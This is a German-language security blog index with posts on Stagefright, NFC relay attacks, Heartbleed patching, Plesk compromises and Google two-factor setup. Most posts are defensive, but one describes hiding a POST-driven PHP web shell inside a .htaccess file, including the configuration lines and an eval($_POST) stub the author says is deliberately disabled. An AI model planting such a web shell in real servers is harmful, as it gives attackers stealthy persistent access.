BotNetzProvider.de Ein Security Blog über Honig-Töpfe (honeypots) , Bots und Bitcoin

28Jul/153

„Stagefright“ possible remote code excecution – disable MMS how-to

STAGEFIGHT-ANDROID-HACK

Security researcher Joshua Drake from Zimperium zLabs announced what he called "he worst Android vulnerabilities discovered to date[...]"

Who can be infected?
Mostly all Android phones ranging from Android version 2.2 bis 5.1.1.
Unfortunately, the bugs found by Zimperium allow shellcode – executable instructions disguised as harmless multimedia data to take control of your device as soon as the content of a malicious message is downloaded.

This bug, as ZimPerium wrote on their blog, can infect around 950.000.000 devices all around the world.

MMS

The infection is spread mostly using MMS and Hangout as MMS/SMS handler.
It's not confirmed but it could be only Android Version < 4.1 are vulnerable to this MMS attack but it is recommended to disable MMS until full-disclosure.

Is there a fix for this vulnerability ?
Not yet, Google did release some fixes and will fix the issue after Joshia's full-disclosure on August 5 at the Black-Hat

CyanogenMod did fix the issue: The following CVE's have been patched in CM12.0

How can I disable MMS functionality ?
Here is a step-by-step instruction which shows you how to disable your MMS functionality:
(Please make backups of the IP addresses in case you want to enable MMS later)

Video (German + ENG subtitles)

Step-by-Step

droidAtScreen-1

droidAtScreen-2

droidAtScreen-3

droidAtScreen-4






droidAtScreen-5

droidAtScreen-6

droidAtScreen-7

1. make a backup of the IP addresses or URL
2. Change alle URL / IP addresses to: 127.0.0.1 - this will disable your MMS functionality

droidAtScreen-8

droidAtScreen-9

droidAtScreen-10






droidAtScreen-11

droidAtScreen-12

It would be great if someone could send me some pictures of an English version of this step-by-step process.

veröffentlicht unter: English, Exploits, news, Sicherheit 3 Kommentare
20Apr/140

RFID Kredit Karten mit Android NFC kopieren

visa

Vor kurzem , wurde ich an einen Vortrag von mir über Keyless-Go erinnert und die damit verbundenen Relay-Attacken.

Es werden zwei Personen dafür benötigt, einer steht beim Opfer und dessen Zugangskarte (Autoschlüssel), sendet das Signal zu seinem Komplizen am Auto und das Auto öffnet.

Ein ähnliches Vorgehen funktioniert auch bei den neuen Kredit-Karten mit RFID. Diese Funktion sollte eigentlich das kontaktlose Zahlen ermöglichen und kann aber auf die selbe Art und Weise missbraucht werden:

NFC HACKING: THE EASY WAY (EDDIE LEE)

Als Gegenmaßnahmen:

RFID Schutzhüllen
(Amazon)

Geldbeutel mit RFID/NFC Blocker
(Amazon)

10Apr/140

Plesk Update SSL Zertifikate

heartbleed

Normalerweise werden für den Login im Plesk eigene generierte SSL-Zertifikate erstellt, die beim Login auf https://meine-domain.tld:8443 aufgerufen werden.

Weiterhin werden SSL-Zertifikate für einzelne Domains, z.B. Online-Shops,etc zur sicheren Übertragung von Kundendaten genutzt.

Durch den "Heartbleed-Bug" können diese sensiblen Daten (Benutzernamen, Passwörter) mitgelesen werden !

Welche Versionen von OpenSSL sind betroffen?
(laut http://heartbleed.com/)

  • OpenSSL 1.0.1 bis 1.0.1f (einschließlich) sind angreifbar
  • OpenSSL 1.0.1g nicht betroffen
  • OpenSSL 1.0.0 branch nicht betroffen
  • OpenSSL 0.9.8 branch nicht betroffen

Wie update ich mein System?
(Upgrades können von System zu System unterschiedlich aussehen, dies hier ist nur ein Beispiel)

Für Debian Systeme:
sudo apt-get update
sudo apt-get upgrade

Für CentOS Systeme:
yum update OpenSSL

Webserver und Plesk selber nach dem Upgrade einmal neustarten.

Gibt es einen online-Test für den Heartbleed-Bug?
Ja, unter : http://filippo.io/Heartbleed/

Empfehlung:
Es wird empfohlen, sofern echte Zertifikate im Einsatz waren, diese neu von seiner Zertifizierungsstelle zu beantragen. Die Zertifikate könnten kompromittiert sein.

Wo finde ich mehr Informationen?
http://heartbleed.com/

Sollten Sie Hilfe benötigen, können Sie sich hier über das Kontakt-Formular melden.

8Apr/140

OpenSSL BUG! aka. „The Heartbleed Bug“ – CVE-2014-0160

OpenSSL BUG! aka. "The Heartbleed Bug"

Mehr Informationen hier : http://heartbleed.com/

Hier kann man Hosts überprüfen, ob diese für CVE-2014-0160 angreifbar ist: http://filippo.io/Heartbleed/
(bitte mit Vorsicht benutzen)

Full Disclosure: http://seclists.org/fulldisclosure/2014/Apr/90

Bash-Test:
(Zeigt aber nur, ob die heartbeat-extention verfügbar ist)

openssl s_client -connect $url:443 -tlsextdebug | grep heartbeat

veröffentlicht unter: news, Sicherheit, Vulnerabilities keine Kommentare
8Apr/143

Millionen von geklauten E-Mail Konten und Passwörter – Ist dein Postfach auch dabei?

logo_bsi_left

Mal wieder sind massenweise E-Mail Daten und Passwörter geklaut worden. Hier der Test, ob auch deine Adresse betroffen ist:

https://www.sicherheitstest.bsi.de/

veröffentlicht unter: news, Sicherheit 3 Kommentare
19Jun/130

Plesk 0day Exploit – KingCope –

Alle älteren Plesk Versionen 7.x bis 10.3.1 sind von dem Exploit betroffen und sind angreifbar.

Lösung:
Updaten Sie Ihr Plesk mindestens auf die sichere Version: 10.4.x oder 11.x
Diese Version ist von dieser speziellen Sicherheitslücke nicht betroffen!

Parallels Plesk hat auch einen Best Practices Guide zum Absichern von Plesk veröffentlicht: http://kb.parallels.com/en/114396/?show_at=de

Ist mein System gehackt?

Sofern Sie von Ihrem Provider eine Abuse E-Mail bekommen haben, ist es meist schon zu spät und man wurde Opfer des Hackerangriffs.

Des weiteren werden, nach einem erfolgreichen Angriff, Perl Skripte unter:

/tmp/
/var/tmp/

abgelegt.
Sofern sich dort ungewöhnliche Dateien befinden, sollte man einmal genauer seine Prozesse und offenen Verbindungen überprüfen.

Sollten Sie professionelle Hilfe benötigen:

ITS Netzwerk Services

Unser Service umfasst:

  • Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
  • Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
  • Langfristige Wartung und Administration Ihrer Systeme
  • Angriffsanalysen und Auswertungen der Angriffe
  • Bedrohungsanalysen
  • Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

25Jul/120

Sicherheitlücke Plesk und deren Folgen

In den letzten Wochen ist viel rund um Plesk passiert.

Angefangen hat es mit einem Angebot von einer Hacker Gruppe, die für ein paar Tausend Dollar ein 0-Day Exploit für Plesk zum Verkauf angeboten hat. Zunächst wurde es als Hoax abgehandelt, bis schließlich die ersten gehackten Server aufgetaucht sind.

Laut Plesk handelt es sich wohl nicht um eine neue Sicherheitslücke, sondern um eine alt bekannte:

No, there is no new security problems in Plesk 10.4.4. The
vulnerability is the old one. Please refer to this article in our
knowledge base: http://kb.parallels.com/en/114330

The attack could occur on patched server if:

1) passwords were stolen previously when servers had a vulnerable
version of Plesk installed. If passwords were not changed using
http://kb.parallels.com/en/113391, then attackers could use them in
order to hack servers.

2) passwords were changed using http://kb.parallels.com/en/113391, but
some end-users changed their passwords back to old ones.

Man kann sich diesbezüglich nicht 100% sicher sein, aber die Analysen laufen noch.

Im Plesk Forum wird von Administratoren berichtet, die trotz des Einspielens der Sicherheitsupdates von Plesk und das Ändern sämtlicher Passwörter in kürzer wieder gehackt worden sind. Hier stellt sich die Frage, ob die Administratoren von Anfang an nach Backdoors und neu angelegten Usern gesucht haben?

Plesk Upgrade:
Seit dem 15.Juli 2012 hat Paralles Plesk ein wichtiges Sicherheitsupdates veröffentlicht für alle Plesk Versionen (v8-10) und Plesk 11 (nur für Windows). Leider wird nicht viel zu dem Update geschrieben, nur das es als „critical“ eingestuft wird und jeder installieren muss. Link

 

Wie kann ich feststellen, ob mein Server gehackt worden ist?

  • Produziert Ihr Server ungewöhnlich viel Traffic?
  • Reagiert er langsamer als normal
  • Hat Ihr Virenscanner verdächtige Dateien gefunden?

Oftmals werden von den Angreifern Cronjobs angelegt und können unter

$ ls /var/spool/cron/tabs/

eingesehen werden.
Gerne werden die Cronjobs als User www-data angelegt und rufen schadhafte Skripte auf.

Auch sollte man die Prozessausgabe „ps“ sich mal genauer ansehen, um ungewöhnliche Prozesse zu identifizieren.

Ein weiteres hilfreiches Tool zur Analyse ist „netstat“ mit dem man offene Verbindungen überprüfen kann.

Falls man mit der Analyse überfordert ist, oder nicht genau sicher ist sollte man sich professionielle Hilfe holen. Ein gehackter Server kann schnell zu vielen Problemen führen.

 

ITS Netzwerk Services

Unser Service umfasst:

  • Schnelle Hilfe bei akuten Sicherheitsproblemen und Hackerangriffen
  • Sicherheitslücken in CMS (z.B. Joomla,Wordpress,etc) schließen
  • Langfristige Wartung und Administration Ihrer Systeme
  • Angriffsanalysen und Auswertungen der Angriffe
  • Bedrohungsanalysen
  • Sicherheitsüberprüfung Ihrer Systeme

Wenn Sie ein individuelles Angebot einholen möchten, schicken Sie uns eine E-Mail an: service@its-netzwerk.com oder besuchen Sie uns www.its-netzwerk.com

21Okt/110

Zwei Wege-Authentifizierung für das Google-Konto

Die Google-Dienste, wie zum Beispiel Google+,Google Mail oder Google Texte und Tabellen, werden von viele Benutzer heutzutage immer häufiger benutzt. Für viele User ist das Google Konto zentrale Sammelstelle für sämtliche E-Mail Accounts und Dokumentenverwaltung. Gerne werden auch private Bilder bei Google Picasa hinterlegt.

Diese Dienste sind nur mit einem Passwort gesichert und sollte dieses einmal in die falschen Hände geraten, ist der Zugriff auf das Google-Konto nicht mehr möglich. Persönliche Daten,Bilder und Dokumente sind nun verloren.

Google hat dafür eine Lösung entwickelt, mit der man eine zusätzliche Sicherheitsebene erhält. Die Zwei-Wege-Authentifizierung.

Heutzutage hat fast jedes größere Unternehmen, eine solche Ebene zur Absicherung eingerichtet. In den meisten Fällen wird ein "RSA-Token" verwendet. Nach der Eingabe des Benutzernamen und Passwort wird noch zusätzlich ein Sicherheitscode, meist in Form einer Zahlenkombination verlangt. Diese zusätzliche Form von Sicherheit bzw. Sicherheitsebene kann nur mit sehr viel Aufwand umgangen werden. RSA-Token

Google hat für seine Benutzer ein ähnliches Verfahren entwickelt. Mit Hilfe des Smart-Phones wird das App Google-Authenticator heruntergeladen und mit dem Google-Konto verknüpft. Eine ausführliche Anleitung auf Deutsch findet man hier:

Erste Schritte bei der Bestätigung in zwei Schritten

Bei dem einloggen in sein Google-Account, wird nun ein Bestätigungscode zusätzlich zu dem Passwort verlangt. Der Bestätigungscode wird alle 45 Sekunden generiert und kann vom Smart-Phone abgelesen werden. Wichtig: Nach der Aktivierung der 2 Wege Authentifizierung muss man immer zusätzlich den Bestätigungscode mit angeben, sonst kann man sich nicht mehr in sein Google-Konto einloggen.

Google-Authentificator

Des weiteren kann man nun auch "Einmal Passwörter" für einzelnen Google-Dienste vergeben. Ein klassisches Beispiel ist, dass man seinem Smart-Phone ein "Einmal Passwort" vergibt. Im Falle, dass man sein Handy verliert, kann man nun aus seinem Google-Konto heraus die Rechte für das Handy entziehen (revoke). Damit erhält der Dieb des Handys KEIN Zugriff mehr auf das Google-Konto.

Die Anleitung für "Einmal Passwörter" findest du hier: Anleitung

!!! WICHTIG !!!
Bei der Aktivierung der 2 Wege Authentifizierung bietet Google einem 10 Notfall-Bestätigungscodes an. Diese müssen an einem Sicheren Ort aufbewahrt werden, da man im Verlustfall des Handys keine weiteren Bestätigungscodes generieren kann. Auch sollte man das Zusenden von Bestätigungscodes via SMS auf ein anderes Handy/Festnetz aktivieren, so dass man zur Not sich immer noch in sein Google-Konto einloggen kann.

veröffentlicht unter: Sicherheit keine Kommentare
1Jun/110

PHP-Shell in .htaccess Datei

Vor kurzem habe ich einen Artikel von Eldar Marcussen gelesen. Er schreibt über die Einbindung von einer PHP-Shell in eine ".htaccess" Datei. Den Ansatz den er verfolgt ist ziemlich interessant, nur leider verursacht seine PHP-Shell zu viel Lärm in der "access_logs" des Webservers.

Zunächst einmal muss man die Weiterleitungsregeln (rewrite) abändern, so dass die ".htaccess" Datei nicht ausgeführt wird und man diese als URL erreichen kann. Als nächstes bearbeiten wir die Datei so, dass der Inhalt als normaler dynamischer Inhalt wieder gegeben wird vom Webserver. Die PHP-Shell muss auskommentiert werden in der ".htaccess", damit der Apache erst die Direktive interpretiert und nicht den PHP Code. Sobald man nun die Datei im Browser aufruft, wird der PHP Code in den PHP Tags ausgeführt und man hat eine funktionierende PHP-Shell. Ich habe mich für eine PHP-Shell die man via POST aufruft entschieden, um den Lärm in den access-logs so gering wie möglich zu halten.

Beispiel .htaccess:

# Orginal von http://www.justanotherhacker.com 
# umgeschrieben von http://blog.botnetzprovider.de 

Order allow,deny
Allow from all

# Apache sagen bitte die .htaccess Datei als PHP interpretieren. 
AddType application/x-httpd-php .htaccess

# Botnetzprovider PHP-Shell
### php eval($_POST['botnetzprovider_sais']);  shell ist so nicht funktionsfähig #
25Jan/110

Backscatter: Wie kann ich meinen Server Testen? (Qmail, Postfix mit Plesk)

Ich bekomme in diesen Tagen immer mehr Anfragen zu Backscatter Problematiken.
Sollten Sie auch eine E-Mail von Ihrem Hoster bekommen haben, der Sie darauf hinweist, dass Ihr Server “backscattert” einfach weiter lesen… [LINK]

/* google like button API */